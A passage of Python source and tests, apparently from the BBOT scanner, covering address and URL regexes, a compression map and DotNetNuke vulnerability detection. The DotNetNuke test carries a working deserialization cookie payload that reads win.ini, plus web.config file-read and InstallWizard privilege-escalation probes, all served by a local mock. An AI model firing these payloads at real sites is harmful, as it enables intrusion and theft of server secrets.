# ([A-F0-9]{1,4}:){1,7}: == 2001::, 2001:db8::, 2001:db8:0:1:2:3::
# ([A-F0-9]{1,4}:){1,6}:([A-F0-9]{1,4}) == 2001::1, 2001:db8::1, 2001:db8:0:1:2:3::1
# ([A-F0-9]{1,4}:){7,7}([A-F0-9]{1,4}) == 1:1:1:1:1:1:1:1, ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff

_ipv6_regex = r"(:(:[A-F0-9]{1,4}){1,7}|([A-F0-9]{1,4}:){1,7}:|([A-F0-9]{1,4}:){1,6}:([A-F0-9]{1,4})|([A-F0-9]{1,4}:){7,7}([A-F0-9]{1,4}))"
ipv6_regex = re.compile(_ipv6_regex, re.I)

_ip_range_regexes = (
    _ipv4_regex + r"\/[0-9]{1,2}",
    _ipv6_regex + r"\/[0-9]{1,3}",
)
ip_range_regexes = list(re.compile(r, re.I) for r in _ip_range_regexes)

# dns names with periods
_dns_name_regex = r"(?:\w(?:[\w-]{0,100}\w)?\.)+(?:[xX][nN]--)?[^\W_]{1,63}\.?"
dns_name_extraction_regex = re.compile(_dns_name_regex, re.I)
dns_name_validation_regex = re.compile(r"^" + _dns_name_regex + r"$", re.I)

# dns names without periods
_hostname_regex = r"(?!\w*\.\w+)\w(?:[\w-]{0,100}\w)?"
hostname_regex = re.compile(r"^" + _hostname_regex + r"$", re.I)

_email_regex = r"(?:[^\W_][\w\-\.\+']{,100})@" + _dns_name_regex
email_regex = re.compile(_email_regex, re.I)

_ptr_regex = r"(?:[0-9]{1,3}[-_\.]){3}[0-9]{1,3}"
ptr_regex = re.compile(_ptr_regex)
# uuid regex
_uuid_regex = r"[0-9a-f]{8}\b-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-\b[0-9a-f]{12}"
uuid_regex = re.compile(_uuid_regex, re.I)
# event uuid regex
_event_uuid_regex = r"[0-9A-Z_]+:[0-9a-f]{8}\b-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-\b[0-9a-f]{12}"
event_uuid_regex = re.compile(_event_uuid_regex, re.I)

_open_port_regexes = (
    _dns_name_regex + r":[0-9]{1,5}",
    _hostname_regex + r":[0-9]{1,5}",
    r"\[" + _ipv6_regex + r"\]:[0-9]{1,5}",
)
open_port_regexes = list(re.compile(r, re.I) for r in _open_port_regexes)

_url_regexes = (
    r"https?://" + _dns_name_regex + r"(?::[0-9]{1,5})?(?:(?:/|\?).*)?",
    r"https?://" + _hostname_regex + r"(?::[0-9]{1,5})?(?:(?:/|\?).*)?",
    r"https?://\[" + _ipv6_regex + r"\](?::[0-9]{1,5})?(?:(?:/|\?).*)?",
)
url_regexes = list(re.compile(r, re.I) for r in _url_regexes)

_double_slash_regex = r"/{2,}"
double_slash_regex = re.compile(_double_slash_regex)

# event type regexes, used throughout BBOT for autodetection of event types, validation, and excavation.
event_type_regexes = OrderedDict(
    (
        (k, tuple(re.compile(r, re.I) for r in regexes))
        for k, regexes in (
            (
                "DNS_NAME",
                (
                    r"^" + _dns_name_regex + r"$",
                    r"^" + _hostname_regex + r"$",
                ),
            ),
            (
                "EMAIL_ADDRESS",
                (r"^" + _email_regex + r"$",),
            ),
            (
                "IP_ADDRESS",
                (
                    r"^" + _ipv4_regex + r"$",
                    r"^" + _ipv6_regex + r"$",
                ),
            ),
            (
                "IP_RANGE",
                tuple(r"^" + r + r"$" for r in _ip_range_regexes),
            ),
            (
                "OPEN_TCP_PORT",
                tuple(r"^" + r + r"$" for r in _open_port_regexes),
            ),
            (
                "URL",
                tuple(r"^" + r + r"$" for r in _url_regexes),
            ),
        )
    )
)

scan_name_regex = re.compile(r"[a-z]{3,20}_[a-z]{3,20}")


# For use with excavate paramaters extractor
input_tag_regex = re.compile(
    r"<input[^>]+?name=[\"\']?([\.$\w]+)[\"\']?(?:[^>]*?value=[\"\']([=+\/\w]*)[\"\'])?[^>]*>"
)
jquery_get_regex = re.compile(r"url:\s?[\"\'].+?\?(\w+)=")
jquery_post_regex = re.compile(r"\$.post\([\'\"].+[\'\"].+\{(.+)\}")
a_tag_regex = re.compile(r"<a[^>]*href=[\"\']([^\"\'?>]*)\?([^&\"\'=]+)=([^&\"\'=]+)")
img_tag_regex = re.compile(r"<img[^>]*src=[\"\']([^\"\'?>]*)\?([^&\"\'=]+)=([^&\"\'=]+)")
get_form_regex = re.compile(
    r"<form[^>]+(?:action=[\"']?([^\s\'\"]+)[\"\']?)?[^>]*method=[\"']?[gG][eE][tT][\"']?[^>]*>([\s\S]*?)<\/form>",
    re.DOTALL,
)
post_form_regex = re.compile(
    r"<form[^>]+(?:action=[\"']?([^\s\'\"]+)[\"\']?)?[^>]*method=[\"']?[pP][oO][sS][tT][\"']?[^>]*>([\s\S]*?)<\/form>",
    re.DOTALL,
)
select_tag_regex = re.compile(
    r"<select[^>]+?name=[\"\']?(\w+)[\"\']?[^>]*>(?:\s*<option[^>]*?value=[\"\'](\w*)[\"\']?[^>]*>)?"
)
textarea_tag_regex = re.compile(
    r'<textarea[^>]*\bname=["\']?(\w+)["\']?[^>]*>(.*?)</textarea>', re.IGNORECASE | re.DOTALL
)
tag_attribute_regex = re.compile(r"<[^>]*(?:href|src)\s*=\s*[\"\']([^\"\']+)[\"\'][^>]*>")

valid_netloc = r"[^\s!@#$%^&()=/?\\'\";~`<>]+"

_split_host_port_regex = r"(?:(?P<scheme>[a-z0-9]{1,20})://)?(?:[^?]*@)?(?P<netloc>" + valid_netloc + ")"
split_host_port_regex = re.compile(_split_host_port_regex, re.I)

_extract_open_port_regex = r"(?:(?:\[([0-9a-f:]+)\])|([^\s:]+))(?::(\d{1,5}))?"
extract_open_port_regex = re.compile(_extract_open_port_regex)

_extract_host_regex = r"(?:[a-z0-9]{1,20}://)?(?:[^?]*@)?(" + valid_netloc + ")"
extract_host_regex = re.compile(_extract_host_regex, re.I)

# for use in recursive_decode()
encoded_regex = re.compile(r"%[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}|\\U[0-9a-fA-F]{8}|\\[ntrbv]")
backslash_regex = re.compile(r"(?P<slashes>\\+)(?P<char>[ntrvb])")

uuid_regex = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}")



import puremagic


def get_magic_info(file):

    magic_detections = puremagic.magic_file(file)
    if magic_detections:
        magic_detections.sort(key=lambda x: x.confidence, reverse=True)
        detection = magic_detections[0]
        return detection.extension, detection.mime_type, detection.name, detection.confidence
    return "", "", "", 0


def get_compression(mime_type):
    mime_type = mime_type.lower()
    # from https://github.com/cdgriffith/puremagic/blob/master/puremagic/magic_data.json
    compression_map = {
        "application/arj": "arj",  # ARJ archive
        "application/binhex": "binhex",  # BinHex encoded file
        "application/epub+zip": "zip",  # EPUB book (Zip archive)
        "application/fictionbook2+zip": "zip",  # FictionBook 2.0 (Zip)
        "application/fictionbook3+zip": "zip",  # FictionBook 3.0 (Zip)
        "application/gzip": "gzip",  # Gzip compressed file
        "application/java-archive": "zip",  # Java Archive (JAR)
        "application/pak": "pak",  # PAK archive
        "application/vnd.android.package-archive": "zip",  # Android package (APK)
        "application/vnd.comicbook-rar": "rar",  # Comic book archive (RAR)
        "application/vnd.comicbook+zip": "zip",  # Comic book archive (Zip)
        "application/vnd.ms-cab-compressed": "cab",  # Microsoft Cabinet archive
        "application/vnd.palm": "palm",  # Palm OS data
        "application/vnd.rar": "rar",  # RAR archive
        "application/x-7z-compressed": "7z",  # 7-Zip archive
        "application/x-ace": "ace",  # ACE archive
        "application/x-alz": "alz",  # ALZip archive
        "application/x-arc": "arc",  # ARC archive
        "application/x-archive": "ar",  # Unix archive
        "application/x-bzip2": "bzip2",  # Bzip2 compressed file
        "application/x-compress": "compress",  # Unix compress file
        "application/x-cpio": "cpio",  # CPIO archive
        "application/x-gzip": "gzip",  # Gzip compressed file
        "application/x-itunes-ipa": "zip",  # iOS application archive (IPA)
        "application/x-java-pack200": "pack200",  # Java Pack200 archive
        "application/x-lha": "lha",  # LHA archive
        "application/x-lrzip": "lrzip",  # Long Range ZIP
        "application/x-lz4-compressed-tar": "lz4",  # LZ4 compressed Tar archive
        "application/x-lz4": "lz4",  # LZ4 compressed file
        "application/x-lzip": "lzip",  # Lzip compressed file
        "application/x-lzma": "lzma",  # LZMA compressed file
        "application/x-par2": "par2",  # PAR2 recovery file
        "application/x-qpress": "qpress",  # Qpress archive
        "application/x-rar-compressed": "rar",  # RAR archive
        "application/x-sit": "sit",  # StuffIt archive
        "application/x-stuffit": "sit",  # StuffIt archive
        "application/x-tar": "tar",  # Tar archive
        "application/x-tgz": "tgz",  # Gzip compressed Tar archive
        "application/x-webarchive": "zip",  # Web archive (Zip)
        "application/x-xar": "xar",  # XAR archive
        "application/x-xz": "xz",  # XZ compressed file
        "application/x-zip-compressed-fb2": "zip",  # Zip archive (FB2)
        "application/x-zoo": "zoo",  # Zoo archive
        "application/x-zstd-compressed-tar": "zstd",  # Zstandard compressed Tar archive
        "application/zip": "zip",  # Zip archive
        "application/zstd": "zstd",  # Zstandard compressed file
    }

    return compression_map.get(mime_type, "")



import re
from .base import ModuleTestBase
from werkzeug.wrappers import Response


dotnetnuke_http_response = """
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html  xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head id="Head">
<!--**********************************************************************************-->
<!-- DotNetNuke - http://www.dotnetnuke.com                                          -->
<!-- Copyright (c) 2002-2012                                                          -->
<!-- by DotNetNuke Corporation                                                        -->
<!--**********************************************************************************-->
<title>
"""


class TestDotnetnuke(ModuleTestBase):
    targets = ["http://127.0.0.1:8888"]
    modules_overrides = ["httpx", "dotnetnuke"]
    config_overrides = {"interactsh_disable": "True"}

    exploit_probe = {
        "Cookie": r'DNNPersonalization=<profile><item key="name1: key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">C:\Windows\win.ini</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>'
    }

    exploit_response = """
    ; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
"""

    webconfig_response = """
    <?xml version="1.0" encoding="utf-8"?>
<configuration>
  <!-- register local configuration handlers -->
  <configSections>
    <sectionGroup name="dotnetnuke">
    </sectionGroup>
  </configSections>
</configuration>
    """

    async def setup_before_prep(self, module_test):
        # Simulate DotNetNuke Instance
        expect_args = {"method": "GET", "uri": "/"}
        respond_args = {"response_data": dotnetnuke_http_response}
        module_test.set_expect_requests(expect_args=expect_args, respond_args=respond_args)

        # DNNPersonalization Deserialization Detection
        expect_args = {"method": "GET", "uri": "/__", "headers": self.exploit_probe}
        respond_args = {"response_data": self.exploit_response}
        module_test.set_expect_requests(expect_args=expect_args, respond_args=respond_args)

        # NewsArticlesSlider ImageHandler.ashx File Read
        expect_args = {
            "method": "GET",
            "uri": "/DesktopModules/dnnUI_NewsArticlesSlider/ImageHandler.ashx",
            "query_string": b"img=~/web.config",
        }
        respond_args = {"response_data": self.webconfig_response}
        module_test.set_expect_requests(expect_args=expect_args, respond_args=respond_args)

        # DNNArticle GetCSS.ashx File Read
        expect_args = {
            "method": "GET",
            "uri": "/DesktopModules/DNNArticle/getcss.ashx",
            "query_string": b"CP=%2fweb.config&smid=512&portalid=3",
        }
        respond_args = {"response_data": self.webconfig_response}
        module_test.set_expect_requests(expect_args=expect_args, respond_args=respond_args)

        # InstallWizard SuperUser Privilege Escalation
        expect_args = {"method": "GET", "uri": "/Install/InstallWizard.aspx", "query_string": b"__viewstate=1"}
        respond_args = {"status": 500}
        module_test.set_expect_requests(expect_args=expect_args, respond_args=respond_args)

        expect_args = {"method": "GET", "uri": "/Install/InstallWizard.aspx"}
        respond_args = {"status": 200}
        module_test.set_expect_requests(expect_args=expect_args, respond_args=respond_args)

    def check(self, module_test, events):
        dnn_technology_detection = False
        dnn_personalization_deserialization_detection = False
        dnn_getcss_fileread_detection = False
        dnn_imagehandler_fileread_detection = False
        dnn_installwizard_privesc_detection = False

        for e in events:
            if e.type == "TECHNOLOGY" and "DotNetNuke" in e.data["technology"]:
                dnn_technology_detection = True

            if (
                e.type == "VULNERABILITY"
                and "DotNetNuke Personalization Cookie Deserialization" in e.data["description"]
            ):
                dnn_personalization_deserialization_detection = True

            if (
                e.type == "VULNERABILITY"
                and "DotNetNuke DNNArticle Module GetCSS.ashx Arbitrary File Read" in e.data["description"]
            ):
                dnn_getcss_fileread_detection = True

            if (
                e.type == "VULNERABILITY"
                and "DotNetNuke dnnUI_NewsArticlesSlider Module Arbitrary File Read" in e.data["description"]
            ):
                dnn_imagehandler_fileread_detection = True

            if (
                e.type == "VULNERABILITY"
                and "DotNetNuke InstallWizard SuperUser Privilege Escalation" in e.data["description"]
            ):
                dnn_installwizard_privesc_detection = True

        assert dnn_technology_detection, "DNN Technology Detection Failed"
        assert dnn_personalization_deserialization_detection, "DNN Personalization Deserialization Detection Failed"
        assert dnn_getcss_fileread_detection, "getcss.ashx File Read Detection Failed"
        assert dnn_imagehandler_fileread_detection, "imagehandler.ashx File Read Detection Failed"
        assert dnn_installwizard_privesc_detection, "InstallWizard privesc Detection Failed"


def extract_subdomain_tag(data):
    pattern = r"([a-z0-9]{4})\.fakedomain\.fakeinteractsh\.com"
    match = re.search(pattern, data)
    if match:
        return match.group(1)


class TestDotnetnuke_blindssrf(ModuleTestBase):
    targets = ["http://127.0.0.1:8888"]
    module_name = "dotnetnuke"
    modules_overrides = ["httpx", "dotnetnuke"]

    def request_handler(self, request):
        subdomain_tag = None
        subdomain_tag = extract_subdomain_tag(request.full_path)
        if subdomain_tag:
            self.interactsh_mock_instance.mock_interaction(subdomain_tag)
        return Response("alive", status=200)

    async def setup_before_prep(self, module_test):

        self.interactsh_mock_instance = module_test.mock_interactsh("dotnetnuke_blindssrf")
        module_test.monkeypatch.setattr(
            module_test.scan.helpers, "interactsh", lambda *args, **kwargs: self.interactsh_mock_instance
        )

    async def setup_after_prep(self, module_test):

        # Simulate DotNetNuke Instance
        expect_args = {"method": "GET", "uri": "/"}
        respond_args = {"response_data": dotnetnuke_http_response}
        module_test.set_expect_requests(expect_args=expect_args, respond_args=respond_args)

        expect_args = re.compile("/")
        module_test.set_expect_requests_handler(expect_args=expect_args, request_handler=self.request_handler)

    def check(self, module_test, events):
        dnn_technology_detection = False
        dnn_dnnimagehandler_blindssrf = False

        for e in events:
            if e.type == "TECHNOLOGY" and "DotNetNuke" in e.data["technology"]:
                dnn_technology_detection = True

            if e.type == "VULNERABILITY" and "DotNetNuke Blind-SSRF (CVE 2017-0929)" in e.data["description"]:
                dnn_dnnimagehandler_blindssrf = True

        assert self.interactsh_mock_instance.interactions == []

        assert dnn_technology_detection, "DNN Technology Detection Failed"
        assert dnn_dnnimagehandler_blindssrf, "dnnimagehandler.ashx Blind SSRF Detection Failed"



import pytest
import traceback

from ..bbot_fixtures import *  # noqa F401
from bbot.core.helpers import regexes
from bbot.errors import ValidationError
from bbot.core.event.helpers import get_event_type


# NOTE: :2001:db8:: will currently cause an exception...
# e.g. raised unknown error: split_port() failed to parse netloc ":2001:db8::"


def test_ip_regexes():
    bad_ip = [
        "203.0..113.0",  # double dot typeo
        ".0.113.0",  # Partial match
        "203.0.113.",  # Partial match
        "203.0.113.0:80",  # correctly formatted with :port appended
        "255.255.255.256",  # octet greater than 255
        "256.255.255.255",  # octet greater than 255
        "2001:db8:::80",  # incorrectly formatted with :port appended
        "[2001:db8::]:80",  # correctly formatted with :port appended
        "2001:db8:g::",  # includes non-hex character,
        "2001.db8.80",  # weird dot separated thing that might actually resolve as a DNS_NAME
        "9e:3e:53:29:43:64",  # MAC address, poor regex patterning will often detect these.
    ]

    good_ip = [
        "0.0.0.0",
        "10.0.0.0",
        "10.255.255.255",
        "127.0.0.0",
        "127.0.0.1",
        "172.16.0.0",
        "172.31.255.255",
        "192.168.0.0",
        "192.168.255.255",
        "203.0.113.0",
        "203.0.113.0/24",
        "255.255.255.255",
        "::1",
        "2001:db8::",
        "2001:db8::1",
        "2001:db8::1/128",
        "1:1:1:1:1:1:1:1",
        "1::1",
        "ffff::ffff",
        "ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff",
    ]

    ip_address_regexes = regexes.event_type_regexes["IP_ADDRESS"]

    for ip in bad_ip:
        for r in ip_address_regexes:
            assert not r.match(ip), f"BAD IP ADDRESS: {ip} matched regex: {r}"

        try:
            event_type, _ = get_event_type(ip)
            if event_type == "OPEN_TCP_PORT":
                if ip.startswith("["):
                    assert ip == "[2001:db8::]:80"
                else:
                    assert ip == "203.0.113.0:80"
                continue
            if event_type == "DNS_NAME":
                if ip.startswith("2001"):
                    assert ip == "2001.db8.80"
                elif ip.startswith("255"):
                    assert ip == "255.255.255.256"
                elif ip.startswith("256"):
                    assert ip == "256.255.255.255"
                else:
                    assert ip == "203.0.113."
                continue
            pytest.fail(f"BAD IP ADDRESS: {ip} matched returned event type: {event_type}")
        except ValidationError:
            continue
        except Exception as e:
            pytest.fail(f"BAD IP ADDRESS: {ip} raised unknown error: {e}")

    for ip in good_ip:
        event_type, _ = get_event_type(ip)
        if not event_type == "IP_ADDRESS":
            if ip.endswith("/24"):
                assert (
                    ip == "203.0.113.0/24" and event_type == "IP_RANGE"
                ), f"Event type for IP_ADDRESS {ip} was not properly detected"
            else:
                assert (
                    ip == "2001:db8::1/128" and event_type == "IP_RANGE"
                ), f"Event type for IP_ADDRESS {ip} was not properly detected"
        else:
            matches = list(r.match(ip) for r in ip_address_regexes)
            assert any(matches), f"Good IP ADDRESS {ip} did not match regexes"


def test_ip_range_regexes():
    bad_ip_ranges = [
        "203.0.113.0",
        "203.0.113.0/",
        "203.0.113.0/a",
        "2001:db8::/",
        "2001:db8::/a",
        "evilcorp.com",
        "[2001:db8::]:80",
    ]

    good_ip_ranges = [
        "203.0.113.0/8",
        "203.0.113.255/32",
        "2001:db8::/128",
        "2001:db8::/4",
    ]

    ip_range_regexes = regexes.event_type_regexes["IP_RANGE"]

    for bad_ip_range in bad_ip_ranges:
        for r in ip_range_regexes:
            assert not r.match(bad_ip_range), f"BAD IP_RANGE: {bad_ip_range} matched regex: {r}"

        event_type = ""
        try:
            event_type, _ = get_event_type(bad_ip_range)
            if event_type == "DNS_NAME":
                assert bad_ip_range == "evilcorp.com"
                continue
            if event_type == "IP_ADDRESS":
                assert bad_ip_range == "203.0.113.0"
                continue
            if event_type == "OPEN_TCP_PORT":
                assert bad_ip_range == "[2001:db8::]:80"
                continue
            pytest.fail(f"BAD IP_RANGE: {bad_ip_range} matched returned event type: {event_type}")
        except ValidationError:
            continue
        except Exception as e:
            pytest.fail(f"BAD IP_RANGE: {bad_ip_range} raised unknown error: {e}: {traceback.format_exc()}")

    for good_ip_range in good_ip_ranges:
        matches = list(r.match(good_ip_range) for r in ip_range_regexes)
        assert any(matches), f"Good IP_RANGE {good_ip_range} did not match regexes"


def test_dns_name_regexes():
    bad_dns = [
        "-evilcorp.com",  # DNS names cannot begin with a dash
        "evilcorp-.com",  # DNS names cannot end with a dash
        "evilcorp..com",  # DNS names cannot have two consecutive dots
        ".evilcorp.com",  # DNS names cannot begin with a dot
        "ev*lcorp.com",  # DNS names cannot have special characters (other than dash and dot)
        "evilcorp/.com",  # DNS names cannot have slashes
        "evilcorp..",  # DNS names cannot end with a dot
        "evilcorp.com/path",  # Paths are not part of DNS names
        "evilcorp.com:80",  # Ports are not part of DNS names
    ]

    good_dns = [
        "evilcorp.com",
        "www.evilcorp.com",
        "subdomain.evilcorp.com",
        "deep.subdomain.evilcorp.com",
        "evilcorp-test.com",
        "evilcorp_com",
        "evilcorpcom",
        "1.2.3.4",
        "1-2-3.net",
        "single-character.tld",
        "asdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdfa.com",
        "asdfasdfasdfasdfgsdgasdfs.asdfasdfasdfasdfasdf.evilcorp.com",
    ]

    dns_name_regexes = regexes.event_type_regexes["DNS_NAME"]

    for dns in bad_dns:
        for r in dns_name_regexes:
            assert not r.match(dns), f"BAD DNS NAME: {dns} matched regex: {r}"

        try:
            event_type, _ = get_event_type(dns)
            if event_type == "OPEN_TCP_PORT":
                assert dns == "evilcorp.com:80"
                continue
            elif event_type == "IP_ADDRESS":
                assert dns == "1.2.3.4"
                continue
            pytest.fail(f"BAD DNS NAME: {dns} matched returned event type: {event_type}")
        except ValidationError:
            continue
        except Exception as e:
            pytest.fail(f"BAD DNS NAME: {dns} raised unknown error: {e}")

    for dns in good_dns:
        matches = list(r.match(dns) for r in dns_name_regexes)
        assert any(matches), f"Good DNS_NAME {dns} did not match regexes"
        event_type, _ = get_event_type(dns)
        if not event_type == "DNS_NAME":
            assert (
                dns == "1.2.3.4" and event_type == "IP_ADDRESS"
            ), f"Event type for DNS_NAME {dns} was not properly detected"


def test_open_port_regexes():
    bad_ports = [
        "1.2.3.4",
        "[dead::beef]",
        "evilcorp.com",
        "asdfasdfasdfasdfasdfasdf.asdfasdfasdfasdfasdf.evilcorp.com",
        "asdfasdfasdfasdfasdfasdf.asdfasdfasdfasdfasdf.evilcorp.com/login",
        "asdfasdfasdfasdfasdfasdf.asdfasdfasdfasdfasdf.evilcorp.com:80/login",
        "192.0.2.1:-80",  # Ports cannot be negative
        "192.0.2.1:800000",  # Ports cannot exceed 65535
        "[2001:db8::]:-80",  # Ports cannot be negative
        "[2001:db8::1]:800000",  # Ports cannot exceed 65535
        "[2001:db8::1]:80/login",  # Ports cannot exceed 65535
        "192.0.2.1:notaport",  # Ports must be a number
        "[2001:db8::1]:notaport",  # Ports must be a number
        "192.0.2.1:",  # Ports cannot be empty
        "[2001:db8::1]:",  # Ports cannot be empty
        "2001:db8::1:65535",  # IPv6 ports must be surrounded by []
    ]

    good_ports = [
        "192.0.2.1:80",
        "192.0.2.1:8080",
        "192.0.2.1:65535",
        "localhost:8888",
        "evilcorp.com:8080",
        "asdfasdfasdfasdfasdfasdf.asdfasdfasdfasdfasdfasdf.asdfasdfasdfsadf.evilcorp.com:8080",
        "[2001:db8::1]:80",
        "[2001:db8::1]:8080",
        "[2001:db8::1]:65535",
    ]

    open_port_regexes = regexes.event_type_regexes["OPEN_TCP_PORT"]

    for open_port in bad_ports:
        for r in open_port_regexes:
            assert not r.match(open_port), f"BAD OPEN_TCP_PORT: {open_port} matched regex: {r}"

        try:
            event_type, _ = get_event_type(open_port)
            if event_type == "IP_ADDRESS":
                assert open_port in ("1.2.3.4", "[dead::beef]")
                continue
            elif event_type == "DNS_NAME":
                assert open_port in ("evilcorp.com", "asdfasdfasdfasdfasdfasdf.asdfasdfasdfasdfasdf.evilcorp.com")
                continue
            pytest.fail(f"BAD OPEN_TCP_PORT: {open_port} matched returned event type: {event_type}")
        except ValidationError:
            continue
        except Exception as e:
            pytest.fail(f"BAD OPEN_TCP_PORT: {open_port} raised unknown error: {e}")

    for open_port in good_ports:
        matches = list(r.match(open_port) for r in open_port_regexes)
        assert any(matches), f"Good OPEN_TCP_PORT {open_port} did not match regexes"
        event_type, _ = get_event_type(open_port)
        assert event_type == "OPEN_TCP_PORT"


def test_url_regexes():
    bad_urls = [
        "http:/evilcorp.com",
        "http:evilcorp.com",
        "http://evilcorp..com",
        "http:///evilcorp.com",
        "http:// evilcorp.com",
        "http://evilcorp com",
        "http://evilcorp.",
        "http://.com",
        "evilcorp.com",
        "http://ex..ample.com",
        "http://evilcorp..com/path",
        "http://evilcorp tool.com",
        "http://evilcorp.com:this_is_not_a_port/path",
        "http://-evilcorp.com",
        "http://evilcorp-.com",
        "http://evilcorp.com-",
        "http://-evilcorp-.com",
        "http://evilcorp-.com/path",
        "http://evilcorp.com-/path",
        "evilcorp.com/path" "asdfasdfasdfasdfgsdgasdfs.asdfasdfasdfasdfasdf.evilcorp.com/path",
        "rhttps://evilcorp.com",
        "https://[e]",
        "https://[1]:80",
    ]

    good_urls = [
        "https://evilcorp.com",
        "https://asdf.www.evilcorp.com",
        "https://asdf.www-test.evilcorp.com",
        "https://a.www-test.evilcorp.c",
        "https://evilcorp.com/asdf?a=b",
        "https://evilcorp.com/asdf/asdf/asdf",
        "https://1.2.3.4/",
        "https://[dead::beef]/",
        "https://[dead:c0de::beef]/",
        "https://asdfasdfasdfasdfasdf.asdfasdfasdfasdfasdfa.sdfasdfasdfasdfsadf.evilcorp.com",
    ]

    url_regexes = regexes.event_type_regexes["URL"]

    for bad_url in bad_urls:
        for r in url_regexes:
            assert not r.match(bad_url), f"BAD URL: {bad_url} matched regex: {r}"

        event_type = ""
        try:
            event_type, _ = get_event_type(bad_url)
            if event_type == "DNS_NAME":
                assert bad_url == "evilcorp.com"
                continue
            pytest.fail(f"BAD URL: {bad_url} matched returned event type: {event_type}")
        except ValidationError:
            continue
        except Exception as e:
            pytest.fail(f"BAD URL: {bad_url} raised unknown error: {e}: {traceback.format_exc()}")

    for good_url in good_urls:
        matches = list(r.match(good_url) for r in url_regexes)
        assert any(matches), f"Good URL {good_url} did not match regexes"
        assert (
            get_event_type(good_url)[0] == "URL_UNVERIFIED"
        ), f"Event type for URL {good_url} was not properly detected"


@pytest.mark.asyncio
async def test_regex_helper():
    from bbot import Scanner

    scan = Scanner("evilcorp.com", "evilcorp.org", "evilcorp.net", "evilcorp.co.uk")

    dns_name_regexes = regexes.event_type_regexes["DNS_NAME"]

    # re.search
    matches = []
    for r in dns_name_regexes:
        match1 = await scan.helpers.re.search(r, "evilcorp.com")
        if match1:
            matches.append(match1)
        match2 = await scan.helpers.re.search(r, "evilcorp")
        if match2:
            matches.append(match2)
    assert len(matches) == 2
    groups = [m.group() for m in matches]
    assert "evilcorp.com" in groups
    assert "evilcorp" in groups

    subdomains = {"www.evilcorp.com", "www.evilcorp.org", "www.evilcorp.co.uk", "www.evilcorp.net"}
    to_search = "\n".join(list(subdomains) * 2)
    assert len(scan.dns_regexes) == 4

    # re.findall
    matches = []
    for dns_regex in scan.dns_regexes:
        for match in await scan.helpers.re.findall(dns_regex, to_search):
            matches.append(match)

    assert len(matches) == 8
    for s in subdomains:
        assert matches.count(s) == 2

    # re.findall_multi
    dns_regexes = {r.pattern: r for r in scan.dns_regexes}
    matches = []
    async for regex_name, results in scan.helpers.re.findall_multi(dns_regexes, to_search):
        assert len(results) == 2
        matches.extend(results)
    assert len(matches) == 8
    for s in subdomains:
        assert matches.count(s) == 2

    await scan._cleanup()

    # test yara hostname extractor helper
    scan = Scanner("evilcorp.com", "www.evilcorp.net", "evilcorp.co.uk")
    host_blob = """
    https://evilcorp.com/
    https://asdf.evilcorp.com/
    https://asdf.www.evilcorp.net/
    https://asdf.www.evilcorp.co.uk/
    https://asdf.www.evilcorp.com/
    https://asdf.www.evilcorp.com/
    https://test.api.www.evilcorp.net/
    """
    extracted = await scan.extract_in_scope_hostnames(host_blob)
    assert extracted == {
        "evilcorp.co.uk",
        "evilcorp.com",
        "www.evilcorp.com",
        "asdf.evilcorp.com",
        "asdf.www.evilcorp.com",
        "www.evilcorp.net",
        "api.www.evilcorp.net",
        "asdf.www.evilcorp.net",
        "test.api.www.evilcorp.net",
        "asdf.www.evilcorp.co.uk",
        "www.evilcorp.co.uk",
    }

    scan = Scanner()
    extracted = await scan.extract_in_scope_hostnames(host_blob)
    assert extracted == set()
